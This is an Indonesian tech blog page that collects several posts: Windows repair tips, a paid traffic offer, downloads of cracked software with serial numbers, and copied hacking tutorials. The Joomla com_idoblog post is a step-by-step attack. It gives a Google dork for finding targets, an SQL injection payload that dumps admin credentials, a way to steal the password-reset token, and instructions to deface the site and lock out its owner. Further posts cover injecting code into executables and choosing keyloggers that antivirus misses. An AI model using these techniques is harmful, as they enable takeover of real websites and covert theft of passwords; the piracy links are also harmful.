Laman

Senin, 23 Mei 2011

Menampilkan entri terbaru dengan label MEMPERCANTIK FLASHDISK. Tampilkan entri lawas

Memberi Icon Pada Flasdisk
Memberi Icon Pada Flashdisk
Buka Notepad Lalu Copy-Paste code berikut

[autorun]
icon=dede.ico

dede.ico adalah nama icon yang ada di flashdisk saya. Ganti dede.ico dengan icon anda

simpan dengan nama autorun.inf
Caranya klik File > Save As… > autorun.inf trus klik Save
Simpan autorun.inf dan icon yang akan anda gunakan ke dalam Flasdisk

Dengan member icon pada flasdisk kita dapat mengetahui apakah flasdisk kita terkena virus atau tidak. Apabila icon tidak tampil pada saat flasdisk di pasang kemungkinan flasdisk kita terkena virus. Karena autorun.inf yang ada pada flasdisk telah di ambil alih oleh virus tersebut. Kebanyakan virus memakai autorun.inf tersebut untuk menjalankan dirinya secara otomatis.Jadi apabila saat anda memasang flasdisk ke komputer icon nya tidak muncul, ada kemungkinan flasdisk anda terkena virus......

untuk membuat icon kita bisa menggunakan software Axialis IconWorkshop.
Silahkan klik dibawah ini:

Download Axialis Icon

Untuk mempercepat download gunakan IDM yang bisa di download DiSini

tags : mempercantik flasdisk, memberi gambar flasdik, flasdik cantik, flasdisk bagus, icon flasdisk, gambar flasdisk.

Mau Traffic/Kunjungan Blog anda 100 - 1000 lebih Visitor per Hari ?

Mau Traffic/Kunjungan Blog anda 100 - 1000 lebih Visitor per Hari ?
tags: cara meningkatkan traffic, kunjungan blog web, traffic tinggi, visitor banyak 100-1000
Pengen traffic atau kunjungan blog anda lebih dari 100/1000 visitor/hari tanpa anda harus capek-capek blogwalking atau melakukan tarffic exchange. Jika di PTC atau Jasa lainnya 500 visitor dihargai 30-40rb dan di PPC minimal 400rb, . Maka Dengan saya hanya 10rb/hari anda akan mendapatkan traffic/kunjungan blog anda:

- Unik visitor antara 100-1000 /hari
- Pageview 500-2500 /hari
- Backlink dari blog ini dan beberapa blog yg Pagerank nya 2-4

hanya dengan 10rb/hari kamu bisa mendapatkan 100-1000 visitor /hari + Bantuan untuk melangsingkan alexa anda (jika 5 hari/lebih) dari puluhan juta menjadi di bawah 10jt.

Syaratnya Blog/web anda harus terpasang histats untuk mengetahui jumlah Visitor dan PageView Blog anda.
Jika anda tidak percaya anda bisa mencoba untuk 1 hari dengan Rp. 10.000 dan anda bisa melihat hasilnya dari histats yang anda pasang....

Anda bisa memilih link mana yang ingin anda tampilkan. Jika berminat silahkan sms ke 081346370918 atau bisa kirim email ke dede_purnama@ymail.com

Bagi anda yang ingin memsang banner di blog ini berikut daftar hargannya:

- 300x250 harga Rp. 50.000/bulan
- 300x60 harga Rp. 20.000/bulan
- 125x125 harga Rp. 10.000/bulan

yang berminat silahkan sms dan kirim banner anda lewat email...
http://ichankyakan.blogspot.com

Cara Memperbaiki Windows Tidak Mau Booting (Registry error)

Cara Memperbaiki Windows Tidak Mau Booting (Registry error)
Komputer yang kita gunakan mungkin pernah mengalami kerusakan sistem (registry) sehingga tidak mau booting atau masuk ke windows. Kerusakan registry ini bisa terjadi karena banyak hal, seperti karena konflik software yang di install, komputer mati mendadak, virus dan sebagainya. Apa tandanya kerusakan registry dan bagaimana mengatasi jika hal ini terjadi ?

Yang pertama perlu diperhatikan adalah membaca apa pesan error atau peringatan (warning) ketika komputer bermasalah. Jika perlu, tulis apa tampilan terakhir atau pesan yang muncul di layar monitor (yang bisa kita gunakan untuk mencari solusi dari internet). Tidak semua error karena kerusakan registry windows. Kerusakan Registry windows biasanya ditandai dengan munculnya pesan seperti berikut :

* Windows could not start because the following file is missing or corrupt: \WINDOWS\SYSTEM32\CONFIG\SYSTEM atau \WINDOWS\SYSTEM32\CONFIG\SOFTWARE, atau \WINDOWS\SYSTEM32\ saja dan sejenisnya
* Stop: c0000218 {Registry File Failure} The registry cannot load the hive (file): \SystemRoot\System32\Config\SOFTWARE or its log or alternate
* System error: Lsass.exe
When trying to update a password the return status indicates that the value provided as the current password is not correct.

Selain contoh pesan error diatas, mungkin masih banyak pesan sejenis yang ditampilkan ketika sistem/registry windows mengalami kerusakan. Jika komputer ketika booting atau restart hanya behenti di pesan error seperti diatas, maka bisa dicoba langkah mudah berikut:

1. Restart Windows
2. Kemudian tekan-tekan tombol F8 sampai muncul tampilan seperti berikut :
Untuk Windows 7 : Repair Your Computer

3. Dari pilihan yang ada, pilih Last Known Good Configuration (untuk windows XP ada ketarangan dalam kurungnya: your most recent setting that worked)
4. Jika berjalan lancar seharusnya bisa kembali masuk ke windows

Setelah langkah diatas, mungkin ada beberapa program atau software yang belum lama di install tidak bisa berjalan sempurna. Hal ini karena bisa jadi backup data registry windows belum menyimpan konfigurasi software yang di install ini, sehingga software tersebut perlu di install ulang.

Jika langkah diatas tidak berhasil, maka mungkin harus dilakukan dengan langkah manual. Intinya adalah mengganti file-file registry windows yang rusak. File-file registry windows ini ada di lokasi c:\windows\system32\config, filenya adalah :

* system
* software
* sam
* security
* default

File-file backup registry ini biasanya ada di folder C:\WINDOWS\repair. Untuk mengganti file-file diatas, bisa menggunakan bootable CD/flashdisk atau manual menggunakan windows repair, langkahnya bisa dilihat selengkapnya di support.microsoft.com

sumber: ebsoft

Windows 7 Error BAD_POOL_HEADER


Windows 7 Error BAD_POOL_HEADER
tags: layar windows 7 biru, kerusakan windows 7, cara memperbaiki windows 7, windows 7 error hang restar
Layar biru BAD_POOL_HEADER biru dapat terjadi ketika Windows 7 gagal untuk mengalokasikan memori dengan benar. Seperti kebanyakan error, ada banyak kemungkinan penyebab sehingga Anda akan perlu melakukan beberapa diagnosa untuk mempersempit masalah.

Penyebab umum kesalahan ini adalah:

1. Adanya bugs dalam sistem driver
2. Masalah Anti-virus

Langkah pertama dalam pemecahan masalah pertama adalah harus memperbarui semua driver sistem Anda, terutama untuk yang digunakan chipset anda pada pengontrol SATA (penyebab ini yang paling sering terjadi). Jika Anda tidak yakin dengan driver chipset yang Anda butuhkan, silahkan posting di forum-forum komputer atau mencari jawabannya melalui gugling. Selain driver Anda juga harus memastikan bahwa sistem Anda sepenuhnya diperbarui dengan service pack terbaru (melalui Windows Update).

Jika kesalahan BSOD (blue screen of death) ini bertahan, Anda dapat mengembalikan instalasi Windows Anda kembali ke titik sebelumnya dengan menggunakan System Restore. Anda juga dapat menggunakan crash dump untuk menemukan rincian lebih lanjut tentang error ini, yang memungkinkan Anda untuk menentukan file bermasalah. File dump terletak di C:WindowsMinidump. Penjelasan mengenai minidump adapat and abaca di sini; http://msdn.microsoft.com/en-us/library/ms680369%28v=vs.85%29.aspx

Jika ternyata proses diatas tidak menyelesaikan masalah maka kemungkinan kedua adalah karena virus. Mengenai virus ini memang sangat rumit karena selain menyebabkan layar biru virus juga dapat menyebabkan banyak masalah lain, misalnya komputer restart sendiri atau computer malah tidak bisa masuk windows.

Untuk penyelesaiannya juga sangat beragam tentang antivirus mana yang terbaik menurut anda.
Cara Mengatasi Komputer/Laptop Lambat
tags: cara agar komputer cepat, memperbaiki komputer lambat, mempercepat laptop
Komputer atau laptop sangat lambat/lelet? tidak seperti saat pertama di beli. Hampir setiap orang pasti pernah mengalami keadaan seperti ini. Mungkin ini adalah hal lama, tapi apakah anda sudah tau cara mengatasinya? Jika belum silahkan tips berikut ini. Untuk mengetahui mengapa komputer bekerja lambat, lemot, berat, maka kita perlu tahu program-program yang menggunakan memori yang besar. Cara mengeceknya dengan ‘Task Manager’.

Ctrl+Alt+Del >> Task Manager >> tab “Process”

Di sini dapat terlihat aplikasi yang memakan memori. Silahkan di-close/end process program-program yang tidak diperlukan. Bersihkan harddisk dengan antivirus terupdate. Gunakan antivirus yang lokal maupun interlokal.

Matikan Start-Up Application. StartUp Application adalah program-program yang berjalan otomatis ketika kita mulai menjalankan Windows. Cara untuk mematikannya:

“Start” >> “Program” >> “Startup”

Lalu Delete semua icon yang ada di folder StartUp. Ada banyak start-up program lain yang mungkin tidak terdeteksi di folder start-up. Untuk mematikan program-program ini, bisa memakai program bernama “Whats Running”. Cara menggunakannya ialah:

Jalankan aplikasi What’s Running >> Tab “Startup” >> uncheck semuanya

Untuk Windows 7:

Control Panel >> Performance Information & Tools (manfaatkan fitur search)>> Adjust Visual Effects

Di tab “Visual Effects”, pilih “Adjust for best performance”. Atau di list yang terdapat di bagian bawah, silahkan uncheck tampilan visual yang tidak diperlukan. Karena semakin banyak yang di-check, maka semakin banyak memori yang digunakan.

gunakan program “TuneUp Utilities”. Program ini dapat menyelesaikan almost semua masalah penyebab komputer lambat (termasuk menggunakan solusi-solusi #1 – #4). Aktifkan Turbo Mode agar kompi bekerja dengan lebih cepat.

gunakan program bernama CCleaner. Program ini berfungsi menghapus data-data yang “kurang” diperlukan yang biasanya memakan memori komputer. Seperti temporary files, unused icons, permasalahan registry, cache, cookies, dll.

Selamat mencoba...
You might also like:
Tips Memproteksi Diri dari Ancaman Cyber
Tips Membuat Irit Konsumsi Baterai Laptop
Penyebab Komputer Menjadi Lambat dan Solusinya
Cara Membuat Password Yang Aman
Cara Mempercepat Browser Opera
LinkWithin
Label: PERBAIKAN KOMPUTER, TIPS dan TRIK KOMPUTER/INTERNET

Internet Download Accelerator 5.10 Software Mempercepat Download Selain IDM

Internet Download Accelerator 5.10 Software Mempercepat Download Selain IDM
tags: download cepat, mempercepat download, pengganti idm, untuk download video musik file
Internet Download Accelerator adalah apliksai/software yang sama seperti internet download manager (IDM) yang berfungsi untuk meningkatkan kecepatan download file dari Internet menggunakan HTTP, HTTPS dan protokol FTP. Percepatan dicapai dengan memisahkan file yang didownload menjadi beberapa bagian dan men-download bagian-bagian pada waktu yang sama. Internet Download Accelerator bisa meresume download yang terputus sehingga tidak perlung mengulang dari awal. Untuk meningkatkan kegunaan Internet Download Accelerator terintegrasi dengan Internet Explorer, Mozilla Firefox, Opera, Nescape dan lain-lain. Selain itu, program monitor clipboard sistem dan mendeteksi URL di clipboard. Dengan IDA Anda dapat men-download dan menyimpan video dari layanan video populer: YouTube, Google Video, Metacafe dan lain-lain. Apapun jenis koneksi Anda, Internet Download Accelerator akan menggunakan bandwidth dari koneksi Anda yang paling efektif dan men-download file sangat cepat.

Sama seperti IDM, IDA juga deteksi file otomatis dengan penempatan file otomatis ke kategori tertentu. Versi baru IDA memiliki kemampuan untuk men-download video dari layanan berbagi video populer dan untuk melihat dan bermain streaming video dengan built-in player. Peningkatan pop-up akan menampilkan informasi rinci tentang kesalahan download dan bagaimana cara untuk memperbaikinya sehingga bisa melakukan download hingga selesai. Peningkatan integrasi dengan Mozilla Firefox dan Opera akan membuat lebih mudah bagi pengguna browser yang populer.

Klik dibawah ini untuk mendapatkannya...

Download IDA + Key

TuneUp Utilities 2011 Full Version + Serial Number


TuneUp Utilities 2011 Full Version + Serial Number

serial number key TuneUp Utilities 2011, download TuneUp Utilities 2011 terbaru, key valid TuneUp
TuneUp Utilities 2011 adalah software untuk mengoptimalkan kinerja Komputer atau Laptop. TuneUp Utilities dapat membuat sistem operasi Windows lebih cepat, lebih nyaman dan lebih aman hanya dengan beberapa klik. Dan semua operasi yang dilakukan pada sistem operasi benar-benar aman, karena semua perubahan yang dipantau oleh TuneUp Rescue Center dan dapat dibatalkan kapan saja.

Semua kerja TuneUp Utilities dapat diakses melalui interface umum yang terbagi menjadi enam kategori. Perangkat lunak ini sangat membantu baik bagi pemula maupun yang ahli untuk membuat Windows memenuhi kebutuhan mereka dengan cara yang lebih baik, lebih mudah dan aman. Semua sistem penting dijelaskan dengan cara yang mudah dan dapat diaktifkan atau dinonaktifkan dengan klik dari mouse anda. TuneUp Utilities akan membuat perubahan yang diperlukan dalam registri atau file boot secara otomatis.

TuneUp Utilities secara otomatis menjalankan tugas-tugas pemeliharaan Komputer/Laptop Anda, membuat Anda mengetahui setiap masalah dan menawarkan solusi sederhana. Hal ini menjamin kinerja selalu yang terbaik. Sebuah komputer yang lambat dan berantakan adalah masa lalu untuk Anda. Anda juga dapat menggunakan TuneUp Utilities untuk menyesuaikan tampilan sistem Windows Anda. Klik dibawah ini untuk mendapatkan TuneUp Utilities 2011

Download TuneUp Utilities 2011
Serial Number TuneUp Utilities 2011

Catatan: TuneUp Utilities 2011 nya jangan di update. klo di update dia akan minta key baru.
Untuk mempercepat download gunakan IDM yang bisa di download DiSini

Jika Muncul Adf.ly klik SKIP AD untuk mendownload filenya
http://ichankyakan.blogspot.com

Hacking Administrator Joomla Com_Idoblog


Hacking Administrator Joomla Com_Idoblog

Hacking Administrator Joomla – Get Full Access!
Tools required:
SQL-i Knowledge
reiluke SQLiHelper 2.7
Joomla! Query Knowledge
Finding Exploit And Target
Those two steps could go in different order, depend what you find first target or exploit…
Google dork: inurl:”option=com_idoblog”
Comes up with results for about 140,000 pages
[Image: 001cv.png]
At inj3ct0r.com search for: com_idoblog
Give us back Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln
[Image: 002rg.png]
==
Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln
==
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10, ​11,12,13,14,15,16+from+jos_users–
Exploit can be separated in two parts:
Part I
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
This part opening blog Admin page and if Admin page don’t exist, exploit won’t worked (not completely confirmed)
Part II
+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,1​5,16+from+jos_users–
This part looking for username and password from jos_users table
Testing Vulnerability
Disable images for faster page loading:
[Firefox]
Tools >> Options >> Content (tab menu) >> and unclick ‘Load images automatically’
Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22
Site load normally…
Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
Site content blog Profile Admin
Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--
Site is vulnerable
Inject Target
Open reiluke SQLiHelper 2.7
In Target copy
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
and click on Inject
Follow standard steps until you find Column Name, as a result we have
[Image: 003bd.png]
Notice that exploit from inj3ct0r wouldn’t work here because it looking for jos_users table and as you can see
our target use jos153_users table for storing data
Let Dump username, email, password from Column Name jos153_users. Click on Dump Now
[Image: 004k.png]
username: admin
email: info@site.com
password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI
Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a
32 character salt that is appended to the end of the password string. The password is stored as
{TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time…
The easiest way to hack is to reset Admin password!
Admin Password Reset
Go to:
Code:
http://www.site.com/index.php?option=com_user&view=reset
This is standard Joomla! query for password reset request
[Image: 005hy.png]
Forgot your Password? page will load.
In E-mail Address: enter admin email (in our case it is:info@site.com) and press Submit.
If you find right admin email, Confirm your account. page will load, asking for Token:
Finding Token
To find token go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users
[Image: 006fj.png]
username: admin
activation: 5482dd177624761a290224270fa55f1d
5482dd177624761a290224270fa55f1d is 32 char verification token, enter it and pres Submit.
[Image: 007pa.png]
If you done everything ok, Rest your Password page will load. Enter your new password…
After that go to:
Code:
http://www.site.com/administrator/
Standard Joomla portal content management system
Enter username admin and your password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!
[Image: 008bo.png]
To make admin life more miserable, click on admin in main Joomla window and in User Details page change admin E-mail
[Image: 009kw.png]
Credit: MindFreak [HckGuide]

Tutorial Injeksi Executable – MessageBox


Tutorial Injeksi Executable – MessageBox


Sebuah aplikasi executable pada Microsoft Windows seperti *.exe, *.dll, *.sys, dan lainnya meskipun
memiliki fungsi berbeda antara satu dan lainnya namun tetap tergolong sebagai satu tipe yaitu Portable
Executable (PE). Sebagai acuan Saya menyarankan Anda membaca buku karangan Mat Pietrek “Peering
Inside the PE: A Tour of the Win32 Portable Executable File Format” buku hebat yang membahas tentang
Portable Executable. Saya sengaja tidak membahasnya disini, karena hanya akan menghabiskan banyak
halaman yang akhirnya membuat mata Anda rusak dan harus memakai kacamata minus seperti Saya :(
File tipe portable Executable tersebut memiliki resiko yang sangat tinggi terhadap berbagai
kemungkinan manipulasi, baik oleh virus maupun hacker. Tidak ada satupun di dunia komputer yang
benar-benar aman dari serangan hacker. Jika ada orang yang mengklaim bahwa dia bisa menjamin
keamanan sebuah aplikasi sampai 90%, berarti orang tersebut adalah orang gila sok tahu! :)
Injeksi Executable hanya bisa dilakukan dengan Reverse Engineering, teknik Reverse Engineering sendiri
merupakan dasar dari seluruh ilmu hacking. Baik hacking (atau lebih tepatnya Cracking:)) sederhana
seperti mengubah tampilan website (Deface atau Poisoning), mencuri data shopping online (Carding),
Serial fishing (Shareware Cracking) sampai dengan hacking tingkat advance (733t) seperti membuat
worm, exploit atau shellcode dan lain sebagainya. Tanpa memiliki dasar Reverse Engineering, belum
tepat jika seseorang mengklaim dirinya sebagai hacker ataupun cracker. Apalagi jika hanya meniru
teknik orang lain. Semoga ini bisa menjawab semua pertanyaan dari teman-teman semua melalui email
Saya tentang bagaimana cara menjadi hacker.
Artikel ini Saya tulis untuk menggambarkan kepada Anda tentang proses injeksi executable.
Pengkodean, pembahasan dan hal lainnya sengaja disederhanakan untuk memudahkan Anda dalam
memahaminya. Maaf, Saya tidak membahas proses injeksi advance dan elit, karena pastinya terlalu
membosankan bagi kebanyakan orang. Mengingat artikel ini ditujukan untuk semua kalangan pembaca.
Alasan lainnya Saya bukanlah juru ketik dan selalu mengantuk saat mengetik dan menulis :)
Beberapa hal yang perlu Anda persiapkan adalah :
  1. Debuger (Saya merekomendasikan Ollydbg, tool gratis dan powerful di http://www.ollydbg.de/) atau Hexa editor (jika Anda 733t hacker seperti orakanggo, tomero, +m03n+, Jowy, anak_tk, CodeMaker dan Apakekdah.. :) )
  2. Notepad atau teks editor yang Anda sukai.
  3. Sedikit pengetahuan tentang Assembly
  4. Target file executable (Untuk menghindari UU Copyright dan DMCA, Saya sudah menyertakan file target bersama artikel ini atau Anda bisa mendownloadnya di website Saya)
  5. Palmall cigarettes, a cup of coffe and Cradle of Filth-Beyond Eleventh Hour.mp3 (Anti ngantuk :) )

Step 1 :
Buka file target “Target.exe” dengan mempergunakan OllyDbg seperti pada Gambar 1.

Gambar 1. OllyDbg load file
Step 2 :
Mencari “Code Cave” program. Code Cave terdiri dari 00 dan 90 yang terdapat pada ruang sebuah
program. Kita bisa mempergunakan Code Cave sebagai tempat injeksi kode kita sendiri. Secara
sederhana bisa dikatakan Code Cave semacam apartemen atau ruang yang tidak terpakai jadi kita bisa
menempatinya dengan bebas dan gratis :)

Gambar 2. Code Cave
Step 3 :
Blok dengan menggunakan cursor mouse pada area Code Cave sesuai dengan bytes yang dibutuhkan,
klik kanan pilih Binary->Edit->OK

Gambar 3. Binary Edit
Step 4 :
Membuat Caption Text. Masukkan karakter pada kolom ASCII, misal “YOU’VE GOT HACKED” tanpa tanda
petik. Lalu tekan OK. Karakter yang Anda ketikkan tersebut akan diasumsikan sebagai bahasa Assembly
bukan sebagai ASCII oleh Ollydbg, untuk merapikannya cukup klik kanan pilih Analysis->Analyze code
(Anda juga bisa mempergunakan CTRL+A atau dengan menggunakan bantuan Plugin “Analyze this!”
untuk mempercepat kerja Anda). Jika berjalan lancar, karakter Anda akan terlihat sebagai ASCII.

Gambar 4. Caption Text

Gambar 5. Analyze

Gambar 6. ASCII Character
Step 5 :
Untuk membuat Message Content atau isi pesan, caranya sama dengan Step 4. Misal isi pesan tersebut
“THIS IS MY STUPID CODE” tanpa tanda petik.

Gambar 7. Message Content
Step 6 :
Sekarang saatnya sedikit bermain dengan bahasa Assembly.. Tenang, Saya tidak akan membahas bahasa
pemrograman yang rumit. Berpikir rumit hanya akan membuat diri kita cepat tua dan membuat kepala
botak.. (sudah pakai kacamata, botak pula, apa kata dunia??? :) )
Disini kita akan menyisipkan sebuah message box (dialog pesan) dengan menggunakan bahasa
Assembly. Ingat, ini adalah metode Reverse Engineering dengan menggunakan Ollydbg jadi hanya ada 2
pilihan pakai bahasa assembly atau hexa, apakah tidak ada yang lebih mudah?
Jawabannya ada.. yaitu matikan komputer, hidupkan MP3 Player lalu tidur:)
MessageBox (Win32 Programmer’s Reference)
Fungsi MessageBox menciptakan, menampilkan dan mengoperasikan sebuah dialog pesan. Dialog pesan
berisi suatu gambaran-aplikasi pesan dan judul, ditambah berbagai kombinasi dari tombol tekan dan
ikon yang dikenal.
Info
Windows NT : Yes
Win95 : Yes
Win32s : Yes
Import Library : user32.lib
Header File : winuser.h
Unicode : WinNT; Win95
Platform Notes : None
Syntax
int MessageBox(
HWND hWnd, // handle of owner window
LPCTSTR lpText, // address of text in message box
LPCTSTR lpCaption, // address of title of message box
UINT uType // style of message box
);
Untuk menyisipkan kode Assembly, klik kanan pilih “Assemble” atau tekan tombol Space pada keyboard
Anda. Pada kolom yang tersedia ketikkan perintah yang ingin Anda sisipkan pada kolom Disassembly,
misal :

Assembly Code Injection
CATATAN, Address pada setiap komputer tidak sama. Jadi sesuaikan dengan Address yang terdapat
pada komputer Anda bukan Address pada artikel ini. Address pada Ollydbg terletak pada kolom sebelah
kiri. Selalu perhatikan dan catat Address yang dipergunakan pada setiap Step artikel ini.

Gambar 8. Assemble

Gambar 9. Injeksi kode Assembly
Step 7 :
Setelah itu saatnya menuju Program Origin, karena tanpa hal itu kode yang Anda sisipkan tidak akan
berjalan. Klik kanan pilih Go to->Origin

Gambar 10. Go to Origin
Saya sarankan Anda mencatat Address, Disassembly dan Hex dump pada Program Origin karena nanti
akan dipergunakan sebagai acuan lompatan Address.
Blok dengan menggunakan cursor mouse 2 Address tersebut, klik kanan pilih Binary->Binary copy

Gambar 11. Binary Copy
Paste kode binary tersebut pada Code Cave yang masih belum dipergunakan, blok area Code Cave
sesuai dengan bytes yang dibutuhkan dengan cursor mouse, klik kanan pilih Binary->Binary paste

Gambar 12. Binary Paste
Step 8 :
Langkah berikutnya adalah mengubah perintah program agar program memanggil kode yang disisipkan.
Pada address 00401019 rubahlah “call 00401BA0″ menjadi “jmp 00401019″. Address 00401019
diperoleh dari Program Origin.

Gambar 13. Merubah Instruksi pada Code Cave
Tahap selanjutnya adalah kembali menuju Program Origin seperti pada Step 7, pada address 00401014
rubahlah “push 00401749″ menjadi “jmp 00404A91″.

Gambar 14. Merubah instruksi pada Program Origin

Gambar 15. Kode Hacked
Proses injeksi sudah lengkap, sekarang simpan program yang telah disisipi kode injeksi tersebut dengan
cara klik kanan pilih Copy to executable->All modifications->Copy all->klik kanan->Save file.

Gambar 16. Preview
Selanjutnya silahkan jalankan file tersebut, jika semua instruksi sudah benar, Anda akan menjumpai
sebuah message box (dialog pesan) di awal program dijalankan. Jika tidak bisa, teliti dari awal karena
mungkin terdapat kesalahan pengkodean. Jika masih tidak bisa, sepertinya Anda tidak hoki mendalami
bidang ilmu komputer. Bagaimana jika menekuni dunia peternakan saja seperti Saya???
Final notes :
Proses injeksi executable bisa Anda kembangkan dengan menggunakan syntax dan metode yang lain,
metode ini juga bisa Anda pergunakan untuk jenis executable lain yang terdapat di komputer Anda,
bahkan untuk executable yang sudah di pack. Misal menggunakan metode Memory Address dan lain
sebagainya.
Setelah membaca artikel ini, bagi Anda yang sering melakukan aktifitas download software terutama di
situs penyedia software bajakan (Cracked Software), ada baiknya Anda melakukan verifikasi integritas
file dengan menggunakan CRC32, MD5 atau file SFV. Hal tersebut bisa membantu Anda mengetahui
keaslian software yang Anda download, apakah sudah ada yang memanipulasinya atau original. Karena
Antivirus sampai saat ini belum bisa diandalkan mengidentifikasi hal tersebut kecuali untuk bundled file.
Untuk menghindari penyalahgunaan dalam hal kejahatan cyber (Contoh: Exploit, Shellcode, Trojan, dan
lainnya) baik oleh lamer, scriptkiddies dan pihak lain yang tidak bertanggungjawab (kecuali 733t..:) ),
Saya sengaja meletakkan “Software Bug (Cacat Program)” yang artinya file target “Target.exe” (ataupun
file lain yang Anda jadikan sebagai target) bisa dijalankan ratusan kali bahkan lebih dengan
menggunakan metode ini namun akan rusak secara otomatis dan tidak dapat dijalankan lagi setelah
komputer Anda direstart. Jadi Anda harus mengulangi lagi setiap tahapan dari awal Semoga artikel ini
bisa memberi manfaat bagi Anda dan membantu Anda menjaga diri Anda dari kejahatan cyber. Terima
kasih.
MRHPx regards and messages :
  • My family for love, peace and emphaty.. Allah SWT and Muhammad SAW for life, light and everything..
  • Reverse Code Engineering scene, Astalavista.MS, Blackhat Community, Indonesia veteran hAxx0r (You know who you are.. :) )
  • Source code semua program atau hack tool (EXCEPT PRIVATE-SECRET TOOLS!) dari seluruh artikel dan rilis NeMeSiS_ByTe dan MRHPx bisa diperoleh dengan cara kontak melalui email baru Saya di atas.. Ehm, sori ganti Nickname sejak 2008 tidak lagi sebagai NeMeSiS_ByTe :) Juga ganti email, ganti website, ganti peruntungan! :) Long live reverser..!
PENTING :
  • Jika Anda request software atau tool yang tidak terdapat di website Saya atau sulit didapatkan (baik software gratis atau berbayar), harap mengganti biaya bandwith internet (Download Broadband) dan biaya pengiriman (CD Distribusi Pos). Harap maklum, Saya bukan milyuner yang mempunyai banyak uang, Saya tidak mungkin membiayai setiap request software dan tool yang Anda butuhkan.
  • Untuk keperluan apapun harap menghubungi Saya melalui email Yahoo atau Facebook, karena nomer telpon Saya hanya untuk keperluan bisnis dan pekerjaan. Bukan dipergunakan untuk CHAT dan tanya jawab.
Oleh : MRHPx aka NeMeSiS_ByTe aka RiZaL
(Pasuruan-Malang, Pebruari 2011)
Email : mrhpx@binushacker.org
Facebook : www.facebook.com/MRHPx (Menghindari scam, kirim pesan dulu, baru di add)
Informasi Tutorial Bila Ada Update: Disini
Mirror: www.mrhpx.co.nr

Key Logger: Tool Pencuri Informasi


Written By : MRHPx aka Rizal (Formerly NeMeSiS_ByTe)
Written On : May 2o11, Between Pasuruan-Malang, Indonesia
Level : Beginner

Binus Hacker Keylogger
HACKINTRO
Artikel ini Saya tulis untuk memenuhi permintaan rekan-rekan melalui email yang penasaran terhadap tool yang disebut Key Logger. Kebetulan hari ini Saya sedang cuti kerja beberapa hari, jadi Saya mempunyai banyak waktu untuk membuka beberapa arsip lama Hack Tool yang tersimpan di server pribadi Saya. Untung semua source code masih tersimpan dengan baik, jadi Saya tidak perlu menulis ulang kode-kode konyol ini. Saya lebih menyukai mempergunakan jari tangan Saya untuk bermain gitar dan membedah hewan. Jari yang keriting terlalu banyak coding tidak mungkin di-rebonding :)

KEY LOGGER (KEYSTROKE LOGGER) DEFINITION
Adalah suatu program yang berjalan di belakang sistem (Background), merekam semua tombol. Sekali Key Logger dijalankan, maka otomatis akan bersembunyi di dalam mesin untuk mencatat semua data atau mengirimkan datanya secara langsung ke pemilik Key Logger.
Pemilik Key Logger kemudian membaca data yang didapatkan tersebut dengan teliti dengan harapan menemukan kata sandi (Password) atau mungkin informasi lain yang bermanfaat yang bisa digunakan sebagai serangan Social Engineering. Key Logger secara sederhana bisa dikategorikan sebagai Hack Tool Pencuri Informasi. Sebagai contoh, Key Logger dapat mengungkapkan isi dari semua e-mail yang ditulis oleh korban. Program Key Logger biasanya terdapat di dalam rootkit dan trojan.
Key Logger berfungsi untuk merekam (mencatat) semua aktifitas pengguna komputer dengan mengambil input data melalui karakter keyboard yang digunakan oleh user. Jadi jika user mengetikkan kata “SaYa” melalui keyboard maka secara otomatis Key Logger akan mencatatnya pada sebuah LOG file dengan data “SaYa”.

HACK TOOL = UTILITIES = KEY LOGGER?
Jika ada pertanyaan, apakah Key Logger itu termasuk tool jahat? atau sejenis software utilities yang baik? Terus terang hanya Anda yang bisa menjawabnya. Kelebihan manusia dengan makhluk lain adalah mampu membedakan mana hal yang baik dan mana hal yang tidak baik.
A) Angel Style..?
Key Logger sering dipergunakan sebagai parental advisory (kontrol orang tua) untuk mengawasi kegiatan anak-anak mereka saat mempergunakan komputer. Selain itu juga sering dipergunakan oleh pemilik internet cafe (warnet), network sharing, dan lainnya untuk mengawasi aktifitas user. Contoh : Pembatas konten dewasa (pr0n), kontrol orang tua terhadap topik pembicaraan anak di internet, etc.
B) Evil Style..?
Di sisi lain Key Logger jika disalahgunakan akan sangat merugikan sekali, terutama bagi user yang menjadi target penyalahgunaan tool Key Logger. Semua karakter yang diketikkan melalui keyboard akan tercatat dengan baik pada LOG file. Entah itu password, Username, nomer PIN bank, account FTP/Facebook/etc. Dari sini Anda tentu bisa membayangkan apa yang akan terjadi jika Anda dan komputer Anda menjadi target kejahatan ini.

TIPS TO PICK BEST STUFF
Key Logger bisa dikategorikan cukup baik dan mampu diandalkan jika memenuhi beberapa kriteria sebagai berikut :
A) Keberadaannya TIDAK TERDETEKSI oleh Antivirus, Anti-Malware dan lainnya,
Anda boleh saja bangga mempunyai Key Logger canggih dan keren, Anda boleh saja menghabiskan uang tabungan Anda untuk membeli software Key Logger yang banyak tersedia di internet. Fakta yang ada adalah 99% Key Logger yang terdapat di internet sudah teridentifikasi oleh Antivirus. Key Logger berharga mahal dan terkenal sekalipun jika sudah terdeteksi oleh Antivirus apa bisa dipergunakan???
B) Memiliki ukuran (Size) yang relatif KECIL < 50 KB,
Size DOES Matter, ukuran itu penting. Key Logger dengan size besar >50KB (seperti monster Godzilla Size DOESN’T Matter) akan menimbulkan kecurigaan di komputer korban. Selain itu proses dan loadingnya sudah pasti lebih lama. Hal ini tidaklah efektif.
C) PORTABLE dan KETERGANTUNGAN resource (dependency),
